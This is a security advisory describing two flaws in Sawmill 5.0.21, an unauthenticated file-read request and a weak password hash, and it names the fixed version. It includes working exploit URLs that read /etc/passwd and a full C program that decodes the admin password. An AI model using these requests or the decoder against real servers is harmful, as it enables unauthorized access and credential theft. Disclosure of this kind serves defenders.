Vulnerability
sawmill
Affected
sawmill5.0.21
Description
Larry Cashdollar found following. SawMill is a site log
statistics package for UNIX, Windows and MacOS. Tests has done
under Linux. In test configuration sawmill listened on port 8987
on webserver. You cna notice two things.
1) You can get sawmill to read you the first line of any (if run
as nobody) world readable files without needing to authenticate
first. The following will print the first line of /etc/passwd:
http://192.168.1.65:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
You can imagine how much more fun this would be if it was
launched as root. Which it should not and does not need to be.
2) The password is stored with a weak hash algorithm and can be
decrypted using the attached C program. This is dangerous
because the previous security hole will allow you to read the
first line of the sawmill/SawmillInfo/SawmillPassword decrypt
the password and access the site statistics, reconfigure
sawmill. Along with the ability to browse the remote machines
drive contents. If this is being run as root then the attacker
can specify root readonly files as log files and read most if
not all of their contents.
/*Decrypt password for Sawmill admin account.
Larry W. Cashdollar
lwc@vapid.betteros.org
http://vapid.betteros.org
usage ./decrypt cyphertext
*/
#include <stdio.h>
char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";
int
main (int argc, char **argv)
{
int x, y;
char cypher[128];
strncpy (cypher, argv[1], 128);
for (x = 0; x < strlen (cypher); x++)
{
for (y = 0; y < strlen (encode); y++)
if (cypher[x] == encode[y])
printf ("%c", alpha[y]);
}
printf("\n\"+\" could also be a space [ ]\n");
}
Sawmill can also be run as a cgi script. This method is
vulnerable as well. The following will print the first line of
the password file
http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
Solution
Sawmill issued a new version of Flowerfire Sawmill (5.0.22) which
corrects both of the vulnerabilities mentioned above. The update
is free.